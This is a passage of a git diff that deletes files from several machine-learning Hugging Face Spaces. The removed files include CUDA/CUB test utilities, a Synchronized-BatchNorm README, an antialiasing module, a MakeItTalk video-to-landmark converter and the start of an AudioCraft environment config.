reference[i]) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]); - return 1; - } - } - return 0; -} - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(float* computed, float* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != reference[i]) - { - float difference = std::abs(computed[i]-reference[i]); - float fraction = difference / std::abs(reference[i]); - - if (fraction > 0.0001) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << "(computed) " << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]) << " (difference:" << difference << ", fraction: " << fraction << ")"; - return 1; - } - } - } - return 0; -} - - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(cub::NullType* computed, cub::NullType* reference, OffsetT len, bool verbose = true) -{ - return 0; -} - -/** - * Compares the equivalence of two arrays - */ -template -int CompareResults(double* computed, double* reference, OffsetT len, bool verbose = true) -{ - for (OffsetT i = 0; i < len; i++) - { - if (computed[i] != 
reference[i]) - { - double difference = std::abs(computed[i]-reference[i]); - double fraction = difference / std::abs(reference[i]); - - if (fraction > 0.0001) - { - if (verbose) std::cout << "INCORRECT: [" << i << "]: " - << CoutCast(computed[i]) << " != " - << CoutCast(reference[i]) << " (difference:" << difference << ", fraction: " << fraction << ")"; - return 1; - } - } - } - return 0; -} - - -/** - * Verify the contents of a device array match those - * of a host array - */ -int CompareDeviceResults( - cub::NullType */* h_reference */, - cub::NullType */* d_data */, - size_t /* num_items */, - bool /* verbose */ = true, - bool /* display_data */ = false) -{ - return 0; -} - -/** - * Verify the contents of a device array match those - * of a host array - */ -template -int CompareDeviceResults( - S *h_reference, - cub::DiscardOutputIterator d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - return 0; -} - -/** - * Verify the contents of a device array match those - * of a host array - */ -template -int CompareDeviceResults( - S *h_reference, - T *d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - // Allocate array on host - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_data, d_data, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - - // Display data - if (display_data) - { - printf("Reference:\n"); - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_reference[i]) << ", "; - } - printf("\n\nComputed:\n"); - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n\n"); - } - - // Check - int retval = CompareResults(h_data, h_reference, num_items, verbose); - - // Cleanup - if (h_data) free(h_data); - - return retval; -} - - -/** - * Verify the contents of a device array match those - * of a device array - */ -template -int CompareDeviceDeviceResults( - T *d_reference, - T *d_data, - size_t num_items, - bool verbose = true, - bool display_data = false) -{ - // Allocate array on host - T *h_reference = (T*) malloc(num_items * sizeof(T)); - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_reference, d_reference, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - cudaMemcpy(h_data, d_data, sizeof(T) * num_items, cudaMemcpyDeviceToHost); - - // Display data - if (display_data) { - printf("Reference:\n"); - for (int i = 0; i < num_items; i++) - { - std::cout << CoutCast(h_reference[i]) << ", "; - } - printf("\n\nComputed:\n"); - for (int i = 0; i < num_items; i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n\n"); - } - - // Check - int retval = CompareResults(h_data, h_reference, num_items, verbose); - - // Cleanup - if (h_reference) free(h_reference); - if (h_data) free(h_data); - - return retval; -} - - -/** - * Print the contents of a host array - */ -void DisplayResults( - cub::NullType */* h_data */, - size_t /* num_items */) -{} - - -/** - * Print the contents of a host array - */ -template -void DisplayResults( - InputIteratorT h_data, - size_t num_items) -{ - // Display data - for (int i = 0; i < int(num_items); i++) - { - std::cout << CoutCast(h_data[i]) << ", "; - } - printf("\n"); -} - - -/** - * Print the contents of a device array - */ -template -void DisplayDeviceResults( - T *d_data, - size_t num_items) -{ - // Allocate array on host - T *h_data = (T*) malloc(num_items * sizeof(T)); - - // Copy data back - cudaMemcpy(h_data, d_data, sizeof(T) * 
num_items, cudaMemcpyDeviceToHost); - - DisplayResults(h_data, num_items); - - // Cleanup - if (h_data) free(h_data); -} - - -/****************************************************************************** - * Segment descriptor generation - ******************************************************************************/ - -/** - * Initialize segments - */ -void InitializeSegments( - int num_items, - int num_segments, - int *h_segment_offsets, - bool verbose = false) -{ - if (num_segments <= 0) - return; - - unsigned int expected_segment_length = (num_items + num_segments - 1) / num_segments; - int offset = 0; - for (int i = 0; i < num_segments; ++i) - { - h_segment_offsets[i] = offset; - - unsigned int segment_length = RandomValue((expected_segment_length * 2) + 1); - offset += segment_length; - offset = CUB_MIN(offset, num_items); - } - h_segment_offsets[num_segments] = num_items; - - if (verbose) - { - printf("Segment offsets: "); - DisplayResults(h_segment_offsets, num_segments + 1); - } -} - - -/****************************************************************************** - * Timing - ******************************************************************************/ - - -struct CpuTimer -{ -#if defined(_WIN32) || defined(_WIN64) - - LARGE_INTEGER ll_freq; - LARGE_INTEGER ll_start; - LARGE_INTEGER ll_stop; - - CpuTimer() - { - QueryPerformanceFrequency(&ll_freq); - } - - void Start() - { - QueryPerformanceCounter(&ll_start); - } - - void Stop() - { - QueryPerformanceCounter(&ll_stop); - } - - float ElapsedMillis() - { - double start = double(ll_start.QuadPart) / double(ll_freq.QuadPart); - double stop = double(ll_stop.QuadPart) / double(ll_freq.QuadPart); - - return float((stop - start) * 1000); - } - -#else - - rusage start; - rusage stop; - - void Start() - { - getrusage(RUSAGE_SELF, &start); - } - - void Stop() - { - getrusage(RUSAGE_SELF, &stop); - } - - float ElapsedMillis() - { - float sec = stop.ru_utime.tv_sec - start.ru_utime.tv_sec; - float usec = stop.ru_utime.tv_usec - start.ru_utime.tv_usec; - - return (sec * 1000) + (usec / 1000); - } - -#endif -}; - -struct GpuTimer -{ - cudaEvent_t start; - cudaEvent_t stop; - - GpuTimer() - { - cudaEventCreate(&start); - cudaEventCreate(&stop); - } - - ~GpuTimer() - { - cudaEventDestroy(start); - cudaEventDestroy(stop); - } - - void Start() - { - cudaEventRecord(start, 0); - } - - void Stop() - { - cudaEventRecord(stop, 0); - } - - float ElapsedMillis() - { - float elapsed; - cudaEventSynchronize(stop); - cudaEventElapsedTime(&elapsed, start, stop); - return elapsed; - } -}; diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h b/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h deleted file mode 100644 index c6ae90664ad9538e73febfde86c334011de417c8..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/cpp/detail/fill.h +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. 
- */ - -#pragma once - -#include - -// this system has no special version of this algorithm - diff --git a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md b/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md deleted file mode 100644 index 779983436c9727dd0d6301a1c857f2360245b51d..0000000000000000000000000000000000000000 --- a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/Synchronized-BatchNorm-PyTorch/README.md +++ /dev/null @@ -1,118 +0,0 @@ -# Synchronized-BatchNorm-PyTorch - -**IMPORTANT: Please read the "Implementation details and highlights" section before use.** - -Synchronized Batch Normalization implementation in PyTorch. - -This module differs from the built-in PyTorch BatchNorm as the mean and -standard-deviation are reduced across all devices during training. - -For example, when one uses `nn.DataParallel` to wrap the network during -training, PyTorch's implementation normalize the tensor on each device using -the statistics only on that device, which accelerated the computation and -is also easy to implement, but the statistics might be inaccurate. -Instead, in this synchronized version, the statistics will be computed -over all training samples distributed on multiple devices. - -Note that, for one-GPU or CPU-only case, this module behaves exactly same -as the built-in PyTorch implementation. - -This module is currently only a prototype version for research usages. As mentioned below, -it has its limitations and may even suffer from some design problems. If you have any -questions or suggestions, please feel free to -[open an issue](https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues) or -[submit a pull request](https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues). - -## Why Synchronized BatchNorm? - -Although the typical implementation of BatchNorm working on multiple devices (GPUs) -is fast (with no communication overhead), it inevitably reduces the size of batch size, -which potentially degenerates the performance. This is not a significant issue in some -standard vision tasks such as ImageNet classification (as the batch size per device -is usually large enough to obtain good statistics). However, it will hurt the performance -in some tasks that the batch size is usually very small (e.g., 1 per GPU). - -For example, the importance of synchronized batch normalization in object detection has been recently proved with a -an extensive analysis in the paper [MegDet: A Large Mini-Batch Object Detector](https://arxiv.org/abs/1711.07240). - -## Usage - -To use the Synchronized Batch Normalization, we add a data parallel replication callback. This introduces a slight -difference with typical usage of the `nn.DataParallel`. - -Use it with a provided, customized data parallel wrapper: - -```python -from sync_batchnorm import SynchronizedBatchNorm1d, DataParallelWithCallback - -sync_bn = SynchronizedBatchNorm1d(10, eps=1e-5, affine=False) -sync_bn = DataParallelWithCallback(sync_bn, device_ids=[0, 1]) -``` - -Or, if you are using a customized data parallel module, you can use this library as a monkey patching. 
- -```python -from torch.nn import DataParallel # or your customized DataParallel module -from sync_batchnorm import SynchronizedBatchNorm1d, patch_replication_callback - -sync_bn = SynchronizedBatchNorm1d(10, eps=1e-5, affine=False) -sync_bn = DataParallel(sync_bn, device_ids=[0, 1]) -patch_replication_callback(sync_bn) # monkey-patching -``` - -You can use `convert_model` to convert your model to use Synchronized BatchNorm easily. - -```python -import torch.nn as nn -from torchvision import models -from sync_batchnorm import convert_model -# m is a standard pytorch model -m = models.resnet18(True) -m = nn.DataParallel(m) -# after convert, m is using SyncBN -m = convert_model(m) -``` - -See also `tests/test_sync_batchnorm.py` for numeric result comparison. - -## Implementation details and highlights - -If you are interested in how batch statistics are reduced and broadcasted among multiple devices, please take a look -at the code with detailed comments. Here we only emphasize some highlights of the implementation: - -- This implementation is in pure-python. No C++ extra extension libs. -- Easy to use as demonstrated above. -- It uses unbiased variance to update the moving average, and use `sqrt(max(var, eps))` instead of `sqrt(var + eps)`. -- The implementation requires that each module on different devices should invoke the `batchnorm` for exactly SAME -amount of times in each forward pass. For example, you can not only call `batchnorm` on GPU0 but not on GPU1. The `#i -(i = 1, 2, 3, ...)` calls of the `batchnorm` on each device will be viewed as a whole and the statistics will be reduced. -This is tricky but is a good way to handle PyTorch's dynamic computation graph. Although sounds complicated, this -will usually not be the issue for most of the models. - -## Known issues - -#### Runtime error on backward pass. - -Due to a [PyTorch Bug](https://github.com/pytorch/pytorch/issues/3883), using old PyTorch libraries will trigger an `RuntimeError` with messages like: - -``` -Assertion `pos >= 0 && pos < buffer.size()` failed. -``` - -This has already been solved in the newest PyTorch repo, which, unfortunately, has not been pushed to the official and anaconda binary release. Thus, you are required to build the PyTorch package from the source according to the - instructions [here](https://github.com/pytorch/pytorch#from-source). - -#### Numeric error. - -Because this library does not fuse the normalization and statistics operations in C++ (nor CUDA), it is less -numerically stable compared to the original PyTorch implementation. Detailed analysis can be found in -`tests/test_sync_batchnorm.py`. - -## Authors and License: - -Copyright (c) 2018-, [Jiayuan Mao](https://vccy.xyz). - -**Contributors**: [Tete Xiao](https://tetexiao.com), [DTennant](https://github.com/DTennant). - -Distributed under **MIT License** (See LICENSE) - diff --git a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py b/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py deleted file mode 100644 index 78da8ebdef518ffe597da1d03ffda09b89b22076..0000000000000000000000000000000000000000 --- a/spaces/manhkhanhUIT/Image_Restoration_Colorization/Global/detection_models/antialiasing.py +++ /dev/null @@ -1,70 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT License. 
- -import torch -import torch.nn.parallel -import numpy as np -import torch.nn as nn -import torch.nn.functional as F - - -class Downsample(nn.Module): - # https://github.com/adobe/antialiased-cnns - - def __init__(self, pad_type="reflect", filt_size=3, stride=2, channels=None, pad_off=0): - super(Downsample, self).__init__() - self.filt_size = filt_size - self.pad_off = pad_off - self.pad_sizes = [ - int(1.0 * (filt_size - 1) / 2), - int(np.ceil(1.0 * (filt_size - 1) / 2)), - int(1.0 * (filt_size - 1) / 2), - int(np.ceil(1.0 * (filt_size - 1) / 2)), - ] - self.pad_sizes = [pad_size + pad_off for pad_size in self.pad_sizes] - self.stride = stride - self.off = int((self.stride - 1) / 2.0) - self.channels = channels - - # print('Filter size [%i]'%filt_size) - if self.filt_size == 1: - a = np.array([1.0,]) - elif self.filt_size == 2: - a = np.array([1.0, 1.0]) - elif self.filt_size == 3: - a = np.array([1.0, 2.0, 1.0]) - elif self.filt_size == 4: - a = np.array([1.0, 3.0, 3.0, 1.0]) - elif self.filt_size == 5: - a = np.array([1.0, 4.0, 6.0, 4.0, 1.0]) - elif self.filt_size == 6: - a = np.array([1.0, 5.0, 10.0, 10.0, 5.0, 1.0]) - elif self.filt_size == 7: - a = np.array([1.0, 6.0, 15.0, 20.0, 15.0, 6.0, 1.0]) - - filt = torch.Tensor(a[:, None] * a[None, :]) - filt = filt / torch.sum(filt) - self.register_buffer("filt", filt[None, None, :, :].repeat((self.channels, 1, 1, 1))) - - self.pad = get_pad_layer(pad_type)(self.pad_sizes) - - def forward(self, inp): - if self.filt_size == 1: - if self.pad_off == 0: - return inp[:, :, :: self.stride, :: self.stride] - else: - return self.pad(inp)[:, :, :: self.stride, :: self.stride] - else: - return F.conv2d(self.pad(inp), self.filt, stride=self.stride, groups=inp.shape[1]) - - -def get_pad_layer(pad_type): - if pad_type in ["refl", "reflect"]: - PadLayer = nn.ReflectionPad2d - elif pad_type in ["repl", "replicate"]: - PadLayer = nn.ReplicationPad2d - elif pad_type == "zero": - PadLayer = nn.ZeroPad2d - else: - print("Pad type [%s] not recognized" % pad_type) - return PadLayer diff --git a/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py b/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py deleted file mode 100644 index 91303de03754bc9ffefc6f589bb685934747e15c..0000000000000000000000000000000000000000 --- a/spaces/marlenezw/audio-driven-animations/MakeItTalk/src/dataset/utils/Av2Flau_Convertor.py +++ /dev/null @@ -1,425 +0,0 @@ -""" - # Copyright 2020 Adobe - # All Rights Reserved. - - # NOTICE: Adobe permits you to use, modify, and distribute this file in - # accordance with the terms of the Adobe license agreement accompanying - # it. - -""" - -import numpy as np -import os -import ffmpeg -import cv2 -import face_alignment -from src.dataset.utils import icp - - -class Point: - def __init__(self, x, y): - self.x = x - self.y = y - - -class ShapeParts: - def __init__(self, np_pts): - self.data = np_pts - - def part(self, idx): - return Point(self.data[idx, 0], self.data[idx, 1]) - - -class Av2Flau_Convertor(): - """ - - Any video to facial landmark and audio numpy data converter. 
- - """ - - def __init__(self, video_dir, out_dir, idx=0): - - self.video_dir = video_dir - if ('\\' in video_dir): - self.video_name = video_dir.split('\\')[-1] - else: - self.video_name = video_dir.split('/')[-1] - self.out_dir = out_dir - self.idx = idx - self.input_format = self.video_dir[-4:] - - # landmark predictor = FANet - self.predictor = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cuda', flip_input=True) - - # landmark register - self.t_shape_idx = (27, 28, 29, 30, 33, 36, 39, 42, 45) - - def convert(self, max_num_frames=250, save_audio=False, show=False, register=False): - - # Step 1: preclean video: check stream==2, convert fps/sample_rate, - ret, wfn = self.__preclean_video__() - if (not ret): - return - - # Step 2: detect facial landmark - wfn = self.video_dir.replace(self.input_format, '_preclean.mp4') - ret, fl2d, fl3d = self.__video_facial_landmark_detection__(video_dir=wfn, display=False, max_num_frames=max_num_frames) - if (not ret): - return - if (len(fl3d) < 9): - print('The length of the landmark is too short, skip') - return - - # Step 3: raw save landmark / audio - fl3d = np.array(fl3d) - np.savetxt(os.path.join(self.out_dir, 'raw_fl3d/fan_{:05d}_{}_3d.txt'.format(self.idx, self.video_name[:-4])), - fl3d, fmt='%.2f') - if (save_audio): - self.__save_audio__(video_dir=self.video_dir.replace(self.input_format, '_preclean.mp4'), fl3d=fl3d) - - # Step 3.5: merge a/v together (optional) - if (show): - sf, ef = (fl3d[0][0], fl3d[-1][0]) if fl3d.shape[0] > 0 else (0, 0) - print(sf, ef) - print(self.video_dir.replace(self.input_format, '_fl_detect.mp4'), - os.path.join(self.out_dir, 'tmp_v', '{:05d}_{}_fl_av.mp4'.format( - self.idx, self.video_name[:-4])) - ) - self.__ffmpeg_merge_av__( - video_dir=self.video_dir.replace(self.input_format, '_fl_detect.mp4'), - audio_dir=self.video_dir.replace(self.input_format, '_preclean.mp4'), - WriteFileName=os.path.join(self.out_dir, 'tmp_v', '{:05d}_{}_fl_av.mp4'.format( - self.idx, self.video_name[:-4])), - start_end_frame=(int(sf), int(ef))) - - # Step 4: remove tmp files - os.remove(self.video_dir.replace(self.input_format, '_preclean.mp4')) - if(os.path.isfile(self.video_dir.replace(self.input_format, '_fl_detect.mp4'))): - os.remove(self.video_dir.replace(self.input_format, '_fl_detect.mp4')) - - # Step 5: register fl3d - if (register): - self.__single_landmark_3d_register__(fl3d) - # TODO: visualize register fl3d - - ''' ======================================================================== - - STEP 1: Preclean video - - ======================================================================== ''' - - def __preclean_video__(self, WriteFileName='_preclean.mp4', fps=25, sample_rate=16000): - ''' - Pre-clean downloaded videos. Return false if more than 2 streams found. 
- Then convert it to fps=25, sample_rate=16kHz - ''' - input_video_dir = self.video_dir if '_x_' not in self.video_dir else self.video_dir.replace('_x_', '/') - - probe = ffmpeg.probe(input_video_dir) - # print(probe['streams']) - # print(len(probe['streams'])) - # if(len(probe['streams']) != 2): - # print('Error: not valid for # of a/v channel == 2.') - # return False, None - # exit(0) - # probe['streams'] = probe['streams'][0::2] - - codec = {'video': '', 'audio': ''} - for i, stream in enumerate(probe['streams'][0:2]): - codec[stream['codec_type']] = stream['codec_name'] - - # create preclean video - ( - ffmpeg - .input(input_video_dir) - .output(self.video_dir.replace(self.input_format, WriteFileName), - # vcodec=codec['video'], - # acodec=codec['audio'], - r=fps, ar=sample_rate) - .overwrite_output().global_args('-loglevel', 'quiet') - .run() - ) - - return True, self.video_dir.replace(self.input_format, WriteFileName) - - ''' ======================================================================== - - STEP 2: Detect facial landmark - - ======================================================================== ''' - - def __video_facial_landmark_detection__(self, video_dir=None, display=False, WriteFileName='_fl_detect.mp4', - max_num_frames=250, write=False): - ''' - Get facial landmark from video. - ''' - - # load video - print('video_dir : ' + video_dir) - video = cv2.VideoCapture(video_dir) - - # return false if cannot open - if (video.isOpened() == False): - print('Unable to open video file') - return False, None - - # display info - length = int(video.get(cv2.CAP_PROP_FRAME_COUNT)) - fps = video.get(cv2.CAP_PROP_FPS) - w = int(video.get(cv2.CAP_PROP_FRAME_WIDTH)) - h = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT)) - print('Process Video {}, len: {}, FPS: {:.2f}, W X H: {} x {}'.format(video_dir, length, fps, w, h)) - - if(write): - writer = cv2.VideoWriter(self.video_dir.replace(self.input_format, WriteFileName), - cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), fps, (w, h)) - - video_facial_landmark = [] # face-landmark np array per frame =: idx + [x,y] * 68 - video_facial_landmark_3d = [] # face-landmark np array per frame =: idx + [x,y,z] * 68 - frame_id = 0 - not_detected_frames = 0 - - while (video.isOpened()): - ret, frame = video.read() - # reach EOF - if (ret == False): - break - - # too many not-detected frames (in middle of video) - if (not_detected_frames > 5): - if (len(video_facial_landmark) < 10): - # at beginning of the video - video_facial_landmark = [] - video_facial_landmark_3d = [] - else: - break - - # dlib facial landmark detect - img_ret, shape, shape_3d = self.__image_facial_landmark_detection__(img=frame) - - # successfully detected - if (img_ret): - # print('\t ==> frame {}/{}'.format(frame_id, length)) - - # current frame xy coordinates - xys = [] - for part_i in range(68): - xys.append(shape.part(part_i).x) - xys.append(shape.part(part_i).y) - - # check any not_detected_frames, and interp them - if (not_detected_frames > 0 and len(video_facial_landmark) > 0): - # interpolate - def interp(last, cur, num, dims=68 * 2 + 1): - interp_xys_np = np.zeros((num, dims)) - for dim in range(dims): - interp_xys_np[:, dim] = np.interp(np.arange(0, num), [-1, num], [last[dim], cur[dim]]) - interp_xys_np = np.round(interp_xys_np).astype('int') - interp_xys = [list(xy) for xy in interp_xys_np] - return interp_xys - - interp_xys = interp(video_facial_landmark[-1], [frame_id] + xys, not_detected_frames) - video_facial_landmark += interp_xys - - not_detected_frames = 0 - - # save 
landmark/frame_index - video_facial_landmark.append([frame_id] + xys) - if (shape_3d.any()): - video_facial_landmark_3d.append([frame_id] + list(np.reshape(shape_3d, -1))) - - if(write): - frame = self.__vis_landmark_on_img__(frame, shape) - - else: - print('\t ==> frame {}/{} Not detected'.format(frame_id, length)) - not_detected_frames += 1 - - if (display): - cv2.imshow('Frame', frame) - if (cv2.waitKey(10) == ord('q')): - break - - if(write): - writer.write(frame) - frame_id += 1 - - if(frame_id > max_num_frames): - break - - video.release() - if(write): - writer.release() - cv2.destroyAllWindows() - - print('\t ==> Final processed frames {}/{}'.format(frame_id, length)) - - return True, video_facial_landmark, video_facial_landmark_3d - - def __image_facial_landmark_detection__(self, img=None): - ''' - Get facial landmark from single image by FANet - ''' - - shapes = self.predictor.get_landmarks(img) - if (not shapes): - return False, None, None - - max_size_idx = 0 - shape = ShapeParts(shapes[max_size_idx][:, 0:2]) - shape_3d = shapes[max_size_idx] - - # when use 2d estimator - shape_3d = np.concatenate([shape_3d, np.ones(shape=(68, 1))], axis=1) - - return True, shape, shape_3d - - def __vis_landmark_on_img__(self, img, shape, linewidth=2): - ''' - Visualize landmark on images. - ''' - if (type(shape) == ShapeParts): - def draw_curve(idx_list, color=(0, 255, 0), loop=False, lineWidth=linewidth): - for i in idx_list: - cv2.line(img, (shape.part(i).x, shape.part(i).y), (shape.part(i + 1).x, shape.part(i + 1).y), - color, lineWidth) - if (loop): - cv2.line(img, (shape.part(idx_list[0]).x, shape.part(idx_list[0]).y), - (shape.part(idx_list[-1] + 1).x, shape.part(idx_list[-1] + 1).y), color, lineWidth) - - draw_curve(list(range(0, 16))) # jaw - draw_curve(list(range(17, 21))) # eye brow - draw_curve(list(range(22, 26))) - draw_curve(list(range(27, 35))) # nose - draw_curve(list(range(36, 41)), loop=True) # eyes - draw_curve(list(range(42, 47)), loop=True) - draw_curve(list(range(48, 59)), loop=True) # mouth - draw_curve(list(range(60, 67)), loop=True) - - else: - def draw_curve(idx_list, color=(0, 255, 0), loop=False, lineWidth=linewidth): - for i in idx_list: - cv2.line(img, (shape[i, 0], shape[i, 1]), (shape[i + 1, 0], shape[i + 1, 1]), color, lineWidth) - if (loop): - cv2.line(img, (shape[idx_list[0], 0], shape[idx_list[0], 1]), - (shape[idx_list[-1] + 1, 0], shape[idx_list[-1] + 1, 1]), color, lineWidth) - - draw_curve(list(range(0, 16))) # jaw - draw_curve(list(range(17, 21))) # eye brow - draw_curve(list(range(22, 26))) - draw_curve(list(range(27, 35))) # nose - draw_curve(list(range(36, 41)), loop=True) # eyes - draw_curve(list(range(42, 47)), loop=True) - draw_curve(list(range(48, 59)), loop=True) # mouth - draw_curve(list(range(60, 67)), loop=True) - - return img - - def __ffmpeg_merge_av__(self, video_dir, audio_dir, WriteFileName, start_end_frame): - probe = ffmpeg.probe(video_dir) - fps = probe['streams'][0]['avg_frame_rate'] - spf = float(fps.split('/')[1]) / float(fps.split('/')[0]) - sf, ef = start_end_frame - st, tt = sf * spf, ef * spf - sf * spf - - vin = ffmpeg.input(video_dir).video - # ain = ffmpeg.input(audio_dir).audio - # out = ffmpeg.output(vin, ain, WriteFileName, codec='copy', ss=st, t=tt, shortest=None) - out = ffmpeg.output(vin, WriteFileName, codec='copy', ss=st, t=tt, shortest=None) - out = out.overwrite_output().global_args('-loglevel', 'quiet') - out.run() - - # os.system('ffmpeg -i {} -codec copy -ss {} -t {} {}'.format(video_dir, st, tt, WriteFileName)) 
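The frame-window-to-seconds arithmetic used by `__ffmpeg_merge_av__` above (and by `__save_audio__` below) is easy to get wrong; here is a minimal standalone sketch of the same computation, assuming the `avg_frame_rate` string comes from `ffmpeg.probe` (e.g. `"25/1"`). The helper name is illustrative and not part of the original file.

```python
# Standalone sketch (not from the original file): map a frame window to ffmpeg's ss/t arguments.
def frame_window_to_seconds(avg_frame_rate: str, start_frame: int, end_frame: int):
    num, den = avg_frame_rate.split('/')            # ffprobe reports e.g. "25/1"
    spf = float(den) / float(num)                   # seconds per frame
    start_sec = start_frame * spf                   # passed to ffmpeg as ss
    duration_sec = (end_frame - start_frame) * spf  # passed to ffmpeg as t
    return start_sec, duration_sec

# Frames 10..110 at 25 fps -> clip starts at 0.4 s and lasts 4.0 s.
print(frame_window_to_seconds("25/1", 10, 110))
```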
- - def __save_audio__(self, video_dir, fl3d): - """ - Extract audio from preclean video. Used for creating audio-aware dataset. - - """ - sf, ef = fl3d[0][0], fl3d[-1][0] - - probe = ffmpeg.probe(video_dir) - fps = probe['streams'][0]['avg_frame_rate'] - spf = float(fps.split('/')[1]) / float(fps.split('/')[0]) - st, tt = sf * spf, ef * spf - sf * spf - - audio_dir = os.path.join(self.out_dir, 'raw_wav', '{:05d}_{}_audio.wav'.format(self.idx, self.video_name[:-4])) - ( - ffmpeg - .input(video_dir) - .output(audio_dir, ss=st, t=tt) - .overwrite_output().global_args('-loglevel', 'quiet') - .run() - ) - - ''' ======================================================================== - - STEP 5: Landmark register - - ======================================================================== ''' - - def __single_landmark_3d_register__(self, fl3d, display=False): - """ - Register a single 3d landmark file - - """ - # Step 1 : Load and Smooth - from scipy.signal import savgol_filter - lines = savgol_filter(fl3d, 7, 3, axis=0) - - all_landmarks = lines[:, 1:].reshape((-1, 68, 3)) # remove frame idx - w, h = int(np.max(all_landmarks[:, :, 0])) + 20, int(np.max(all_landmarks[:, :, 1])) + 20 - - # Step 2 : setup anchor face - print('Using exisiting ' + 'dataset/utils/ANCHOR_T_SHAPE_{}.txt'.format(len(self.t_shape_idx))) - anchor_t_shape = np.loadtxt('dataset/utils/ANCHOR_T_SHAPE_{}.txt'.format(len(self.t_shape_idx))) - - registered_landmarks_to_save = [] - registered_affine_mat_to_save = [] - # for each line - for line in lines: - frame_id = line[0] - landmarks = line[1:].reshape(68, 3) - - # Step 3 : ICP on (frame, anchor) - frame_t_shape = landmarks[self.t_shape_idx, :] - - T, distance, itr = icp(frame_t_shape, anchor_t_shape) - - # Step 4 : Affine transform - landmarks = np.hstack((landmarks, np.ones((68, 1)))) - registered_landmarks = np.dot(T, landmarks.T).T - err = np.mean(np.sqrt(np.sum((registered_landmarks[self.t_shape_idx, 0:3] - anchor_t_shape) ** 2, axis=1))) - # print(err, distance, itr) - - # Step 5 : Save is requested - registered_landmarks_to_save.append([frame_id] + list(registered_landmarks[:, 0:3].reshape(-1))) - registered_affine_mat_to_save.append([frame_id] + list(T.reshape(-1))) - - # Step 5.5 (optional) : visualize ori / registered faces (Isolated in Black BG) - if (display): - img = np.zeros((h, w * 2, 3), np.uint8) - self.__vis_landmark_on_img__(img, landmarks.astype(np.int)) - registered_landmarks[:, 0] += w - self.__vis_landmark_on_img__(img, registered_landmarks.astype(np.int)) - cv2.imshow('img', img) - if (cv2.waitKey(30) == ord('q')): - break - - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_fl_sm.txt' - .format(self.idx, self.video_name[:-4])), - lines, fmt='%.6f') - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_fl_reg.txt' - .format(self.idx, self.video_name[:-4])), - np.array(registered_landmarks_to_save), fmt='%.6f') - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_mat_reg.txt' - .format(self.idx, self.video_name[:-4])), - np.array(registered_affine_mat_to_save), fmt='%.6f') - - -if __name__ == '__main__': - video_dir = r'C:\Users\yangzhou\Videos\004_1.mp4' - out_dir = r'C:\Users\yangzhou\Videos' - c = Av2Flau_Convertor(video_dir, out_dir, idx=0) - c.convert() - diff --git a/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py b/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py deleted file mode 100644 index adc7819305758bb50a9984928bfa7f13eabef5f5..0000000000000000000000000000000000000000 
--- a/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py +++ /dev/null @@ -1,176 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Provides cluster and tools configuration across clusters (slurm, dora, utilities). -""" - -import logging -import os -from pathlib import Path -import re -import typing as tp - -import omegaconf - -from .utils.cluster import _guess_cluster_type - - -logger = logging.getLogger(__name__) - - -class AudioCraftEnvironment: - """Environment configuration for teams and clusters. - - AudioCraftEnvironment picks compute cluster settings (slurm, dora) from the current running environment - or declared variable and the loaded team configuration. Additionally, the AudioCraftEnvironment - provides pointers to a reference folder resolved automatically across clusters that is shared across team members, - allowing to share sigs or other files to run jobs. Finally, it provides dataset mappers to automatically - map dataset file paths to new locations across clusters, allowing to use the same manifest of files across cluters. - - The cluster type is identified automatically and base configuration file is read from 